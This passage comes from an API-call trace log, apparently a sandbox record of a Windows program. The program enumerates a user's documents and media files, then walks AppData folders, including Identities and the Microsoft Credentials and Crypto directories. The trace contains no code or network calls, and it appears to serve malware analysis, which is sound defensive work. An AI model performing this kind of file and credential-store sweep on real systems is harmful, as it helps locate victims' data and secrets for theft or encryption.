ftLastAccessTime.dwLowDateTime=0x8abd4c0, ftLastAccessTime.dwHighDateTime=0x1d7e4a3, ftLastWriteTime.dwLowDateTime=0x8abd4c0, ftLastWriteTime.dwHighDateTime=0x1d7e4a3, nFileSizeHigh=0x0, nFileSizeLow=0xbd1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mywNs2wOosDagMLK0w.png", cAlternateFileName="MYWNS2~1.PNG")) returned 1 [0207.365] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x326c0fd0, ftCreationTime.dwHighDateTime=0x1d7e423, ftLastAccessTime.dwLowDateTime=0x49541e90, ftLastAccessTime.dwHighDateTime=0x1d7e6f3, ftLastWriteTime.dwLowDateTime=0x49541e90, ftLastWriteTime.dwHighDateTime=0x1d7e6f3, nFileSizeHigh=0x0, nFileSizeLow=0xd024, dwReserved0=0x0, dwReserved1=0x0, cFileName="NGr7BR 0P3yRc1c.doc", cAlternateFileName="NGR7BR~1.DOC")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7203180, ftCreationTime.dwHighDateTime=0x1d7d7b8, ftLastAccessTime.dwLowDateTime=0x8e7fe690, ftLastAccessTime.dwHighDateTime=0x1d7e683, ftLastWriteTime.dwLowDateTime=0x8e7fe690, ftLastWriteTime.dwHighDateTime=0x1d7e683, nFileSizeHigh=0x0, nFileSizeLow=0x2ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfE5uAfEt0ta7i.mp3", cAlternateFileName="OFE5UA~1.MP3")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd1e4c550, ftCreationTime.dwHighDateTime=0x1d7e0f1, ftLastAccessTime.dwLowDateTime=0xcf82f7f0, ftLastAccessTime.dwHighDateTime=0x1d7e6cd, ftLastWriteTime.dwLowDateTime=0xcf82f7f0, ftLastWriteTime.dwHighDateTime=0x1d7e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x147e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="oWyd6MAjYLDyZ02F7J.swf", cAlternateFileName="OWYD6M~1.SWF")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de11b20, ftCreationTime.dwHighDateTime=0x1d7e0ef, ftLastAccessTime.dwLowDateTime=0x2098d6d0, ftLastAccessTime.dwHighDateTime=0x1d7e6b7, ftLastWriteTime.dwLowDateTime=0x2098d6d0, ftLastWriteTime.dwHighDateTime=0x1d7e6b7, nFileSizeHigh=0x0, nFileSizeLow=0x15e21, dwReserved0=0x0, dwReserved1=0x0, cFileName="PdJehCXyJz0.doc", cAlternateFileName="PDJEHC~1.DOC")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xddf9a560, ftCreationTime.dwHighDateTime=0x1d7e46e, ftLastAccessTime.dwLowDateTime=0x5441e500, ftLastAccessTime.dwHighDateTime=0x1d7e4e4, ftLastWriteTime.dwLowDateTime=0x5441e500, ftLastWriteTime.dwHighDateTime=0x1d7e4e4, nFileSizeHigh=0x0, nFileSizeLow=0x1716d, dwReserved0=0x0, dwReserved1=0x0, cFileName="pntbx17fZl-QX.mkv", cAlternateFileName="PNTBX1~1.MKV")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8cd1cf40, ftCreationTime.dwHighDateTime=0x1d7d8cb, ftLastAccessTime.dwLowDateTime=0x9089730, ftLastAccessTime.dwHighDateTime=0x1d7dd02, ftLastWriteTime.dwLowDateTime=0x9089730, ftLastWriteTime.dwHighDateTime=0x1d7dd02, nFileSizeHigh=0x0, nFileSizeLow=0x170ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="qFp f_Bw-DaF.wav", cAlternateFileName="QFPF_B~1.WAV")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa52417b0, ftCreationTime.dwHighDateTime=0x1d7e1c2, ftLastAccessTime.dwLowDateTime=0xda51c4a0, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0xda51c4a0, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0x79c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RC-I_.xlsx", cAlternateFileName="RC-I_~1.XLS")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd79a82b0, ftCreationTime.dwHighDateTime=0x1d7d772, ftLastAccessTime.dwLowDateTime=0x830dc9c0, ftLastAccessTime.dwHighDateTime=0x1d7e193, ftLastWriteTime.dwLowDateTime=0x830dc9c0, ftLastWriteTime.dwHighDateTime=0x1d7e193, nFileSizeHigh=0x0, nFileSizeLow=0x11654, dwReserved0=0x0, dwReserved1=0x0, cFileName="TYXj7Mf9kiTNxBG4U.jpg", cAlternateFileName="TYXJ7M~1.JPG")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53ffb1a0, ftCreationTime.dwHighDateTime=0x1d7db7d, ftLastAccessTime.dwLowDateTime=0xd08a9f90, ftLastAccessTime.dwHighDateTime=0x1d7e1cd, ftLastWriteTime.dwLowDateTime=0xd08a9f90, ftLastWriteTime.dwHighDateTime=0x1d7e1cd, nFileSizeHigh=0x0, nFileSizeLow=0x47c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="U4k m_UwUJ5.rtf", cAlternateFileName="U4KM_U~1.RTF")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55d9bfc0, ftCreationTime.dwHighDateTime=0x1d7e186, ftLastAccessTime.dwLowDateTime=0xee7f0850, ftLastAccessTime.dwHighDateTime=0x1d7e2f0, ftLastWriteTime.dwLowDateTime=0xee7f0850, ftLastWriteTime.dwHighDateTime=0x1d7e2f0, nFileSizeHigh=0x0, nFileSizeLow=0xf222, dwReserved0=0x0, dwReserved1=0x0, cFileName="ULvvd4df.rtf", cAlternateFileName="")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x548b20b0, ftCreationTime.dwHighDateTime=0x1d7e3ec, ftLastAccessTime.dwLowDateTime=0xb0ab26f0, ftLastAccessTime.dwHighDateTime=0x1d7e550, ftLastWriteTime.dwLowDateTime=0xb0ab26f0, ftLastWriteTime.dwHighDateTime=0x1d7e550, nFileSizeHigh=0x0, nFileSizeLow=0x1746c, dwReserved0=0x0, dwReserved1=0x0, cFileName="uSg0j03ql.gif", cAlternateFileName="USG0J0~1.GIF")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x416a9db0, ftCreationTime.dwHighDateTime=0x1d7de5d, ftLastAccessTime.dwLowDateTime=0xd052f6c0, ftLastAccessTime.dwHighDateTime=0x1d7e16a, ftLastWriteTime.dwLowDateTime=0xd052f6c0, ftLastWriteTime.dwHighDateTime=0x1d7e16a, nFileSizeHigh=0x0, nFileSizeLow=0x497d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Va7N8fMY.bmp", cAlternateFileName="")) returned 1 [0207.366] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6be3c800, ftCreationTime.dwHighDateTime=0x1d7da39, ftLastAccessTime.dwLowDateTime=0xa43a0670, ftLastAccessTime.dwHighDateTime=0x1d7defc, ftLastWriteTime.dwLowDateTime=0xa43a0670, ftLastWriteTime.dwHighDateTime=0x1d7defc, nFileSizeHigh=0x0, nFileSizeLow=0xbbdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="w9M6OFbhEpYW.xls", cAlternateFileName="W9M6OF~1.XLS")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3923a0e0, ftCreationTime.dwHighDateTime=0x1d7e1b7, ftLastAccessTime.dwLowDateTime=0x698c9240, ftLastAccessTime.dwHighDateTime=0x1d7e2e4, ftLastWriteTime.dwLowDateTime=0x698c9240, ftLastWriteTime.dwHighDateTime=0x1d7e2e4, nFileSizeHigh=0x0, nFileSizeLow=0xc04e, dwReserved0=0x0, dwReserved1=0x0, cFileName="X1FXDB0xedsK-UQ_h.ods", cAlternateFileName="X1FXDB~1.ODS")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1eb1a50, ftCreationTime.dwHighDateTime=0x1d7dd83, ftLastAccessTime.dwLowDateTime=0xe1878070, ftLastAccessTime.dwHighDateTime=0x1d7e294, ftLastWriteTime.dwLowDateTime=0xe1878070, ftLastWriteTime.dwHighDateTime=0x1d7e294, nFileSizeHigh=0x0, nFileSizeLow=0x1744, dwReserved0=0x0, dwReserved1=0x0, cFileName="yeAAj6D6.m4a", cAlternateFileName="")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8479090, ftCreationTime.dwHighDateTime=0x1d7e608, ftLastAccessTime.dwLowDateTime=0xe37f3340, ftLastAccessTime.dwHighDateTime=0x1d7e62d, ftLastWriteTime.dwLowDateTime=0xe37f3340, ftLastWriteTime.dwHighDateTime=0x1d7e62d, nFileSizeHigh=0x0, nFileSizeLow=0x110ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="zFLCzSQx9vSdvYNAAr.flv", cAlternateFileName="ZFLCZS~1.FLV")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x635af0d0, ftCreationTime.dwHighDateTime=0x1d7dc8e, ftLastAccessTime.dwLowDateTime=0x95eb90b0, ftLastAccessTime.dwHighDateTime=0x1d7dd59, ftLastWriteTime.dwLowDateTime=0x95eb90b0, ftLastWriteTime.dwHighDateTime=0x1d7dd59, nFileSizeHigh=0x0, nFileSizeLow=0xa4c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1P9Jk_pu6Ra 0a.mp3", cAlternateFileName="_1P9JK~1.MP3")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c0d4600, ftCreationTime.dwHighDateTime=0x1d7dccb, ftLastAccessTime.dwLowDateTime=0x8a07b8c0, ftLastAccessTime.dwHighDateTime=0x1d7dfdc, ftLastWriteTime.dwLowDateTime=0x8a07b8c0, ftLastWriteTime.dwHighDateTime=0x1d7dfdc, nFileSizeHigh=0x0, nFileSizeLow=0x1549a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_Q74.jpg", cAlternateFileName="")) returned 1 [0207.391] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c0d4600, ftCreationTime.dwHighDateTime=0x1d7dccb, ftLastAccessTime.dwLowDateTime=0x8a07b8c0, ftLastAccessTime.dwHighDateTime=0x1d7dfdc, ftLastWriteTime.dwLowDateTime=0x8a07b8c0, ftLastWriteTime.dwHighDateTime=0x1d7dfdc, nFileSizeHigh=0x0, nFileSizeLow=0x1549a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_Q74.jpg", cAlternateFileName="")) returned 0 [0207.392] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed34) returned 1 [0207.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef94) returned 1 [0207.393] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0207.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0207.393] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0207.393] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.397] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.398] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0207.398] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0207.398] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0207.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0207.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0207.398] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0207.399] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.399] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.399] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0207.399] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.399] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0207.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0207.399] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0207.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.399] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0207.400] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.400] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.400] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.400] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.401] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0207.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0207.401] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0207.401] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 